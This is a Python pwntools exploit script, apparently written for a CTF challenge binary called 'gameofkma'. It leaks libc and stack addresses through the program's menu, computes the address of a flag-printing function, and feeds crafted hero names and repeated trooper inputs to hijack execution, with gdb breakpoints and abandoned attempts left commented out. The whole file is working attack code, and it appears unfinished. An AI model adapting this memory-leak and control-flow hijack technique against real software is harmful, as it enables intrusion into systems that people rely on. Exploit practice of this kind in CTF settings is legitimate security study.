#!/usr/bin/env python3

from pwn import *

exe = ELF("gameofkma_patched")
libc = ELF("libc-2.27.so")
ld = ELF("ld-2.27.so")

context.binary = exe
p = process(exe.path)
context.terminal = ["foot"]

gdb.attach(p, gdbscript='''
           # b*0x555555556256 
           # b*0x18d5 +0x555555554000 
           # b*0x1946 + 0x555555554000
           # b*0x55555555594e
           b*0x2305  + 0x555555554000

''')



def main():

    # good luck pwning :)
    p.sendlineafter(b' want?(0-5)\n',b'0')
    p.sendlineafter(b'do you want?(0-2)',b'1')
    p.recv(2)
    leak_libc = u64(p.recv(6)+b'\0\0')
    log.info('leak_libc: ' + hex(leak_libc))
    p.recv(9)
    leak_stack = int(b'0x'+p.recv(12),16)
    log.info('leak_stack: ' + hex(leak_stack))
    base = leak_libc - 0x1e8a
    log.info('base: ' + hex(base))
    flag_print = base + 0x1d71
    log.info('flag_print: ' + hex(flag_print))
    twobytes = flag_print & 0xffff
    p.sendlineafter(b'hero do you want?(0-2)',b'5')

    # p.sendlineafter(b'hero do you want?(0-2)',b'12')
    p.sendafter(b' your hero?',b'lmaodark')
    p.sendafter(b' your hero?',b'darklmao')
    p.sendafter(b' your hero?',b'antk')
    p.sendafter(b' your hero?',b'antkss')
    # p.sendafter(b' your hero?',b'lmaodark')
    # p.sendafter(b' your hero?',b'a'*0x10)
    # p.sendafter(b' your hero?',b'a'*0x10)
    # p.sendafter(b' your hero?',b'a'*0x10)
    # p.sendlineafter(b' your hero?',b'a'*16)
    # p.sendlineafter(b' your hero?',b'a'*16)
    # p.sendlineafter(b' your hero?',b'a'*16)
    # p.sendlineafter(b' your hero?',b'a'*16)
    # p.sendlineafter(b' your hero?',b'a'*16)
    # # p.sendlineafter(b' your hero?',b'\0')
    # # p.sendlineafter(b' your hero?',b'\0')
    # # p.sendlineafter(b' your hero?',b'\0')
    # # p.sendlineafter(b' your hero?',b'a'*4+p64(flag_print))
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.sendlineafter(b'[0]trooper?(1/0)',b'1')
    p.sendlineafter(b' you think? >',b'1231464')
    p.interactive()


if __name__ == "__main__":
    main()
